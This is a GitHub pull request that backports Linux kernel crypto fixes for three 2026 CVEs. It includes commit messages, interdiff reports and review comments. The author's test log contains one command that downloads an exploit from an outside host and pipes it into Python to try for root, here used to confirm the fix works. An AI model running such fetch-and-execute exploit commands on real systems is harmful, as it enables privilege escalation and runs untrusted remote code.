Skip to content

[LTS 9.6] CVE-2026-23060, CVE-2026-31431, CVE-2026-31677#1165

Merged
PlaidCat merged 10 commits into
ciqlts9_6from
{jmaple}_ciqlts9_6
Apr 30, 2026
Merged

[LTS 9.6] CVE-2026-23060, CVE-2026-31431, CVE-2026-31677#1165
PlaidCat merged 10 commits into
ciqlts9_6from
{jmaple}_ciqlts9_6

Conversation

@PlaidCat

@PlaidCat PlaidCat commented Apr 30, 2026

Copy link
Copy Markdown
Collaborator

This is an initial work to address CVE-2026-31677.
During our investigation we found there to be bug (and CVEs) on CVEs to address about the time we found a minimal set of changes to address the issue CentOS-Stream-9 produced https://gitlab.com/redhat/centos-stream/src/kernel/centos-stream-9/-/merge_requests/8078 which is has had 3 additional patches (Including the call out in https://bugzilla.kernel.org/show_bug.cgi?id=221332 that still on cyptodev). We opted to sync with them as these changes apply to all of the 9.x series.
We also identified an additional bug fix we think is worth adding crypto: algif_aead - Fix minimum RX size check for decryption

We have established this works and resolves the impact.
I've created this PR before my final build with the exact versions of the exact patches exist. As soon as thats done building I will post the results.

[jmaple@localhost lts-9.6]$ id
uid=1000(jmaple) gid=1000(jmaple) groups=1000(jmaple) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[jmaple@localhost lts-9.6]$ uname -r
5.14.0-jmaple_ciqlts9_6-945aa894d474+
[jmaple@localhost lts-9.6]$ curl https://copy.fail/exp | python3.11 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   4939      0 --:--:-- --:--:-- --:--:--  4939
Password: su: Authentication failure
Password:
[jmaple@localhost lts-9.6]$ id
uid=1000(jmaple) gid=1000(jmaple) groups=1000(jmaple) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Usual break down will be posted when they CI is done.

BUILD (abbreviated)

[TIMER]{MODULES}: 12s
Making Install
sh ./arch/x86/boot/install.sh 5.14.0-jmaple_ciqlts9_6-945aa894d474+ \
        arch/x86/boot/bzImage System.map "/boot"
[TIMER]{INSTALL}: 21s
Checking kABI
kABI check passed
Setting Default Kernel to /boot/vmlinuz-5.14.0-jmaple_ciqlts9_6-945aa894d474+ and Index to 6
The default is /boot/loader/entries/3a14ed4e7af2460ab6d8c9ce5afdbbd0-5.14.0-jmaple_ciqlts9_6-945aa894d474+.conf with index 6 and kernel /boot/vmlinuz-5.14.0-jmaple_ciqlts9_6-945aa894d474+
The default is /boot/loader/entries/3a14ed4e7af2460ab6d8c9ce5afdbbd0-5.14.0-jmaple_ciqlts9_6-945aa894d474+.conf with index 6 and kernel /boot/vmlinuz-5.14.0-jmaple_ciqlts9_6-945aa894d474+
Generating grub configuration file ...
Adding boot menu entry for UEFI Firmware Settings ...
done
Hopefully Grub2.0 took everything ... rebooting after time metrices
[TIMER]{MRPROPER}: 3s
[TIMER]{BUILD}: 1495s
[TIMER]{MODULES}: 12s
[TIMER]{INSTALL}: 21s
[TIMER]{TOTAL} 1536s

jira VULN-181881
cve-pre CVE-2026-31431
commit-author Norbert Szetei <norbert@doyensec.com>
commit 62397b4
commit-source centos-stream-9

The AF_ALG interface fails to unmark the end of a Scatter/Gather List (SGL)
when chaining a new af_alg_tsgl structure. If a sendmsg() fills an SGL
exactly to MAX_SGL_ENTS, the last entry is marked as the end. A subsequent
sendmsg() allocates a new SGL and chains it, but fails to clear the end
marker on the previous SGL's last data entry.

This causes the crypto scatterwalk to hit a premature end, returning NULL
on sg_next() and leading to a kernel panic during dereference.

Fix this by explicitly unmarking the end of the previous SGL when
performing sg_chain() in af_alg_alloc_tsgl().

Fixes: 8ff5909 ("crypto: algif_skcipher - User-space interface for skcipher operations")
	Signed-off-by: Norbert Szetei <norbert@doyensec.com>
	Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
@PlaidCat PlaidCat self-assigned this Apr 30, 2026
@github-actions

Copy link
Copy Markdown

🤖 Validation Checks In Progress Workflow run: https://github.com/ctrliq/kernel-src-tree/actions/runs/25188762252

@github-actions

Copy link
Copy Markdown

🔍 Upstream Linux Kernel Commit Check

  • ❌ PR commit a9b691047cc (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) references CVE-2026-31431 but
    upstream commit e02494114ebf has no CVE assigned

This is an automated message from the kernel commit checker workflow.

@github-actions

Copy link
Copy Markdown

🔍 Interdiff Analysis

  • ⚠️ PR commit 3ea328304c5 (crypto: algif_aead - Revert to operating out-of-place) → upstream a664bf3d603d
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -208,13 +208,72 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sg;
 
-	err = crypto_aead_copy_sgl(null_tfm, tsgl_src, rsgl_src,
-				   ctx->aead_assoclen);
-	if (err)
-		goto free;
+	if (ctx->enc) {
+		/*
+		 * Encryption operation - The in-place cipher operation is
+		 * achieved by the following operation:
+		 *
+		 * TX SGL: AAD || PT
+		 *	    |	   |
+		 *	    | copy |
+		 *	    v	   v
+		 * RX SGL: AAD || PT || Tag
+		 */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, processed);
+		if (err)
+			goto free;
+		af_alg_pull_tsgl(sk, processed, NULL, 0);
+	} else {
+		/*
+		 * Decryption operation - To achieve an in-place cipher
+		 * operation, the following  SGL structure is used:
+		 *
+		 * TX SGL: AAD || CT || Tag
+		 *	    |	   |	 ^
+		 *	    | copy |	 | Create SGL link.
+		 *	    v	   v	 |
+		 * RX SGL: AAD || CT ----+
+		 */
+
+		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, outlen);
+		if (err)
+			goto free;
+
+		/* Create TX SGL for tag and chain it to RX SGL. */
+		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
+						       processed - as);
+		if (!areq->tsgl_entries)
+			areq->tsgl_entries = 1;
+		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
+							 areq->tsgl_entries),
+					  GFP_KERNEL);
+		if (!areq->tsgl) {
+			err = -ENOMEM;
+			goto free;
+		}
+		sg_init_table(areq->tsgl, areq->tsgl_entries);
+
+		/* Release TX SGL, except for tag data and reassign tag data. */
+		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
+
+		/* chain the areq TX SGL holding the tag with RX SGL */
+		if (usedpages) {
+			/* RX SGL present */
+			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+
+			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
+			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
+				 areq->tsgl);
+		} else
+			/* no RX SGL present (e.g. authentication only) */
+			rsgl_src = areq->tsgl;
+	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
 			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -26,7 +26,6 @@
 #include <crypto/internal/aead.h>
 #include <crypto/scatterwalk.h>
 #include <crypto/if_alg.h>
-#include <crypto/skcipher.h>
 #include <linux/init.h>
 #include <linux/list.h>
 #include <linux/kernel.h>
@@ -72,7 +71,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct af_alg_ctx *ctx = ask->private;
 	struct crypto_aead *tfm = pask->private;
-	unsigned int i, as = crypto_aead_authsize(tfm);
+	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -182,64 +177,7 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
-	if (ctx->enc) {
-		/*
-		 * Encryption operation - The in-place cipher operation is
-		 * achieved by the following operation:
-		 *
-		 * TX SGL: AAD || PT
-		 *	    |	   |
-		 *	    | copy |
-		 *	    v	   v
-		 * RX SGL: AAD || PT || Tag
-		 */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
-			      processed);
-		af_alg_pull_tsgl(sk, processed, NULL, 0);
-	} else {
-		/*
-		 * Decryption operation - To achieve an in-place cipher
-		 * operation, the following  SGL structure is used:
-		 *
-		 * TX SGL: AAD || CT || Tag
-		 *	    |	   |	 ^
-		 *	    | copy |	 | Create SGL link.
-		 *	    v	   v	 |
-		 * RX SGL: AAD || CT ----+
-		 */
-
-		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
-
-		/* Create TX SGL for tag and chain it to RX SGL. */
-		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
-						       processed - as);
-		if (!areq->tsgl_entries)
-			areq->tsgl_entries = 1;
-		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
-							 areq->tsgl_entries),
-					  GFP_KERNEL);
-		if (!areq->tsgl) {
-			err = -ENOMEM;
-			goto free;
-		}
-		sg_init_table(areq->tsgl, areq->tsgl_entries);
-
-		/* Release TX SGL, except for tag data and reassign tag data. */
-		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
-
-		/* chain the areq TX SGL holding the tag with RX SGL */
-		if (usedpages) {
-			/* RX SGL present */
-			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
-			struct scatterlist *sg = sgl_prev->sgt.sgl;
-
-			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
-			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
-		} else
-			/* no RX SGL present (e.g. authentication only) */
-			rsgl_src = areq->tsgl;
-	}
+	memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
@@ -242,7 +180,7 @@
 	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
 			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -62,6 +69,6 @@
-	struct aead_tfm *aeadc = pask->private;
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_sync_skcipher *null_tfm = aeadc->null_tfm;
+	struct alg_sock *pask = alg_sk(psk);
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int i, as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
@@ -210,7 +184,7 @@
 	 */
 
 	/* Use the RX SGL as source (and destination) for crypto op. */
-	rsgl_src = areq->first_rsgl.sgl.sg;
+	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
 	if (ctx->enc) {
 		/*
@@ -223,10 +197,8 @@
 		 *	    v	   v
 		 * RX SGL: AAD || PT || Tag
 		 */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, processed);
-		if (err)
-			goto free;
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
+			      processed);
 		af_alg_pull_tsgl(sk, processed, NULL, 0);
 	} else {
 		/*
@@ -240,11 +212,8 @@
 		 * RX SGL: AAD || CT ----+
 		 */
 
-		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, outlen);
-		if (err)
-			goto free;
+		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
 
 		/* Create TX SGL for tag and chain it to RX SGL. */
 		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
@@ -267,10 +236,10 @@
 		if (usedpages) {
 			/* RX SGL present */
 			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+			struct scatterlist *sg = sgl_prev->sgt.sgl;
 
-			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
-			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
-				 areq->tsgl);
+			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
+			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
 		} else
 			/* no RX SGL present (e.g. authentication only) */
 			rsgl_src = areq->tsgl;
@@ -279,5 +248,5 @@
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
@@ -478,4 +447,4 @@
-	struct crypto_aead *tfm = aeadc->aead;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int ivlen = crypto_aead_ivsize(tfm);
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -310,7 +359,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct crypto_skcipher *tfm = pask->private;
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
 	sock_kzfree_s(sk, ctx->iv, crypto_skcipher_ivsize(tfm));
-	sock_kfree_s(sk, ctx, ctx->len);
-	af_alg_release_parent(sk);
+	if (ctx->state)
+		sock_kzfree_s(sk, ctx->state, crypto_skcipher_statesize(tfm));
  • ⚠️ PR commit 94fcf6643fa (crypto: af_alg - limit RX SG extraction by receive buffer budget) → upstream 8eceab19eba9
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -82,14 +82,8 @@
 	 * If more buffers are to be expected to be processed, process only
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used) {
-		if (len < bs) {
-			err = -EINVAL;
-			goto free;
-		}
-
+	if (ctx->more || len < ctx->used)
 		len -= len % bs;
-	}
 
 	/*
 	 * Create a per request TX SGL for this request which tracks the

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -130,6 +130,11 @@
 	 * full block size buffers.
 	 */
 	if (ctx->more || len < ctx->used) {
+		if (len < bs) {
+			err = -EINVAL;
+			goto free;
+		}
+
 		len -= len % bs;
 		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
 	}

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -79,7 +79,6 @@
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used)
+	if (ctx->more || len < ctx->used) {
 		len -= len % bs;
-
-	/*
-	 * Create a per request TX SGL for this request which tracks the
+		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
+	}
  • ⚠️ PR commit 40e02d80581 (crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec) → upstream 2397e9264676
    Differences found:
================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -275,6 +253,6 @@
 	u32 tmp[2];
 	int err;
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
+	if (req->src != dst)
  • ⚠️ PR commit a9b691047cc (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) → upstream e02494114ebf
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -164,10 +164,7 @@
 	authenc_esn_request_complete(areq, err);
 }
 
-static int crypto_authenc_esn_copy_sg(struct aead_request *req,
-				      struct scatterlist *src,
-				      struct scatterlist *dst,
-				      unsigned int len)
+static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
 	struct crypto_authenc_esn_ctx *ctx = crypto_aead_ctx(authenc_esn);
@@ -176,16 +173,11 @@
 	skcipher_request_set_sync_tfm(skreq, ctx->null);
 	skcipher_request_set_callback(skreq, aead_request_flags(req),
 				      NULL, NULL);
-	skcipher_request_set_crypt(skreq, src, dst, len, NULL);
+	skcipher_request_set_crypt(skreq, req->src, req->dst, len, NULL);
 
 	return crypto_skcipher_encrypt(skreq);
 }
 
-static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
-{
-	return crypto_authenc_esn_copy_sg(req, req->src, req->dst, len);
-}
-
 static int crypto_authenc_esn_encrypt(struct aead_request *req)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
@@ -245,7 +237,6 @@
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-	int err;
 
 	if (!authsize)
 		goto decrypt;
@@ -255,11 +246,8 @@
 		scatterwalk_map_and_copy(tmp, dst, 4, 4, 0);
 		scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 0);
 		scatterwalk_map_and_copy(tmp, dst, 0, 8, 1);
-	} else {
-		err = crypto_authenc_esn_copy(req, assoclen);
-		if (err)
-			return err;
-	}
+	} else
+		memcpy_sglist(dst, src, assoclen);
 
 	if (crypto_memneq(ihash, ohash, authsize))
 		return -EBADMSG;
@@ -308,8 +296,13 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	if (!authsize)
-		goto tail;
+	cryptlen -= authsize;
+
+	if (req->src != dst) {
+		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
+		if (err)
+			return err;
+	}
 
 	cryptlen -= authsize;
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
@@ -327,10 +320,7 @@
 
 		src = scatterwalk_ffwd(areq_ctx->src, src, 8);
 		dst = scatterwalk_ffwd(areq_ctx->dst, dst, 4);
-		err = crypto_authenc_esn_copy_sg(req, src, dst,
-						 assoclen + cryptlen - 8);
-		if (err)
-			return err;
+		memcpy_sglist(dst, src, assoclen + cryptlen - 8);
 		dst = req->dst;
 	}
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -268,10 +274,8 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	cryptlen -= authsize;
-
-	if (req->src != dst)
-		memcpy_sglist(dst, req->src, assoclen + cryptlen);
+	if (!authsize)
+		goto tail;
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -225,10 +204,9 @@
-			      crypto_ahash_alignmask(auth) + 1);
+	u8 *ohash = areq_ctx->tail;
 	unsigned int cryptlen = req->cryptlen - authsize;
 	unsigned int assoclen = req->assoclen;
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-
 	if (!authsize)
 		goto decrypt;
 
@@ -281,11 +254,8 @@
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
-		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
-		if (err)
-			return err;
-	}
+	if (req->src != dst)
+		memcpy_sglist(dst, req->src, assoclen + cryptlen);
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);
  • ⚠️ PR commit 945aa894d47 (crypto: algif_aead - snapshot IV for async AEAD requests) → upstream 5aa58c3a572b
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -221,7 +221,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, iv);
+			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -193,7 +199,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -69,5 +69,5 @@
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_sync_skcipher *null_tfm = aeadc->null_tfm;
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -209,7 +184,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

This is an automated interdiff check for backported commits.

@github-actions

Copy link
Copy Markdown

JIRA PR Check Results

1 commit(s) with issues found:

Commit 40e02d80581d

Summary: crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec

⚠️ Warnings:

  • VULN-175569: No time logged - please log time manually

Summary: Checked 10 commit(s) total.

@github-actions

Copy link
Copy Markdown

Validation checks completed successfully View full results: https://github.com/ctrliq/kernel-src-tree/actions/runs/25188762252

kemotaha
kemotaha previously approved these changes Apr 30, 2026
@PlaidCat

Copy link
Copy Markdown
Collaborator Author

🔍 Upstream Linux Kernel Commit Check

* ❌ PR commit `a9b691047cc (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption)` references `CVE-2026-31431` but
  upstream commit `e02494114ebf` has no CVE assigned

This is an automated message from the kernel commit checker workflow.

See note that CENTOS labeled this as CVE-2026-31431 i was going to label it a cve-bf CVE-2026-23060

@PlaidCat PlaidCat requested a review from a team April 30, 2026 21:27
@PlaidCat

Copy link
Copy Markdown
Collaborator Author

@kerneltoast kerneltoast left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Remove #include <crypto/skcipher.h> from crypto/algif_aead.c and amend that change into crypto: algif_aead - Revert to operating out-of-place

Herbert Xu and others added 9 commits April 30, 2026 18:09
jira VULN-181881
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit a664bf3
commit-source centos-stream-9

This mostly reverts commit 72548b0 except for the copying of
the associated data.

There is no benefit in operating in-place in algif_aead since the
source and destination come from different mappings.  Get rid of
all the complexity added for in-place operation and just copy the
AD directly.

Fixes: 72548b0 ("crypto: algif_aead - copy AAD from src to dst")
    Reported-by: Taeyang Lee <0wn@theori.io>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-182991
cve CVE-2026-31677
commit-author Douya Le <ldy3087146292@gmail.com>
commit 8eceab1
commit-source centos-stream-9

Make af_alg_get_rsgl() limit each RX scatterlist extraction to the
remaining receive buffer budget.

af_alg_get_rsgl() currently uses af_alg_readable() only as a gate
before extracting data into the RX scatterlist. Limit each extraction
to the remaining af_alg_rcvbuf(sk) budget so that receive-side
accounting matches the amount of data attached to the request.

If skcipher cannot obtain enough RX space for at least one chunk while
more data remains to be processed, reject the recvmsg call instead of
rounding the request length down to zero.

Fixes: e870456 ("crypto: algif_skcipher - overhaul memory management")
    Reported-by: Yifan Wu <yifanwucs@gmail.com>
    Reported-by: Juefei Pu <tomapufckgml@gmail.com>
    Co-developed-by: Yuan Tan <yuantan098@gmail.com>
    Signed-off-by: Yuan Tan <yuantan098@gmail.com>
    Suggested-by: Xin Liu <bird@lzu.edu.cn>
    Signed-off-by: Douya Le <ldy3087146292@gmail.com>
    Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-182991
cve-bf CVE-2026-31677
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 31d0015
commit-source centos-stream-9

When page reassignment was added to af_alg_pull_tsgl the original
loop wasn't updated so it may try to reassign one more page than
necessary.

Add the check to the reassignment so that this does not happen.

Also update the comment which still refers to the obsolete offset
argument.

    Reported-by: syzbot+d23888375c2737c17ba5@syzkaller.appspotmail.com
Fixes: e870456 ("crypto: algif_skcipher - overhaul memory management")
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>

Signed-off-by: Herbert Xu <herbert.xu@redhat.com>
…SN spec

jira VULN-175569
cve CVE-2026-23060
commit-author Taeyang Lee <0wn@theori.io>
commit 2397e92
commit-source centos-stream-9

authencesn assumes an ESP/ESN-formatted AAD. When assoclen is shorter than
the minimum expected length, crypto_authenc_esn_decrypt() can advance past
the end of the destination scatterlist and trigger a NULL pointer dereference
in scatterwalk_map_and_copy(), leading to a kernel panic (DoS).

Add a minimum AAD length check to fail fast on invalid inputs.

Fixes: 104880a ("crypto: authencesn - Convert to new AEAD interface")
    Reported-By: Taeyang Lee <0wn@theori.io>
    Signed-off-by: Taeyang Lee <0wn@theori.io>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
…e decryption

jira VULN-181881
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit e024941
commit-source centos-stream-9
commit-note CentOS attributes this to CVE-2026-31431 but it fixes the
	same code commit as CVE-2026-23060. I defaulted to the centos
	attribution for consistency with our upstream.

When decrypting data that is not in-place (src != dst), there is
no need to save the high-order sequence bits in dst as it could
simply be re-copied from the source.

However, the data to be hashed need to be rearranged accordingly.

    Reported-by: Taeyang Lee <0wn@theori.io>
Fixes: 104880a ("crypto: authencesn - Convert to new AEAD interface")
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>

Thanks,

    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181881
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 1f48ad3
commit-source centos-stream-9

The src SG list offset wasn't set properly when decrypting in-place,
fix it.

    Reported-by: Wolfgang Walter <linux@stwm.de>
Fixes: e024941 ("crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption")
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181881
cve-bf CVE-2026-31431
commit-author Yucheng Lu <kanolyc@gmail.com>
commit -
commit-source-sha 5db6ef9
commit-source centos-stream-9, cryptodev

authencesn requires either a zero authsize or an authsize of at least
4 bytes because the ESN encrypt/decrypt paths always move 4 bytes of
high-order sequence number data at the end of the authenticated data.

While crypto_authenc_esn_setauthsize() already rejects explicit
non-zero authsizes in the range 1..3, crypto_authenc_esn_create()
still copied auth->digestsize into inst->alg.maxauthsize without
validating it.  The AEAD core then initialized the tfm's default
authsize from that value.

As a result, selecting an ahash with digest size 1..3, such as
cbcmac(cipher_null), exposed authencesn instances whose default
authsize was invalid even though setauthsize() would have rejected the
same value.  AF_ALG could then trigger the ESN tail handling with a
too-short tag and hit an out-of-bounds access.

Reject authencesn instances whose ahash digest size is in the invalid
non-zero range 1..3 so that no tfm can inherit an unsupported default
authsize.

Fixes: f15f05b ("crypto: ccm - switch to separate cbcmac driver")
    Cc: stable@kernel.org
    Reported-by: Yifan Wu <yifanwucs@gmail.com>
    Reported-by: Juefei Pu <tomapufckgml@gmail.com>
    Co-developed-by: Yuan Tan <yuantan098@gmail.com>
    Signed-off-by: Yuan Tan <yuantan098@gmail.com>
    Suggested-by: Xin Liu <bird@lzu.edu.cn>
    Tested-by: Yuhang Zheng <z1652074432@gmail.com>
    Reviewed-by: Eric Biggers <ebiggers@kernel.org>
    Signed-off-by: Yucheng Lu <kanolyc@gmail.com>
    Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181881
cve-bf CVE-2026-31431
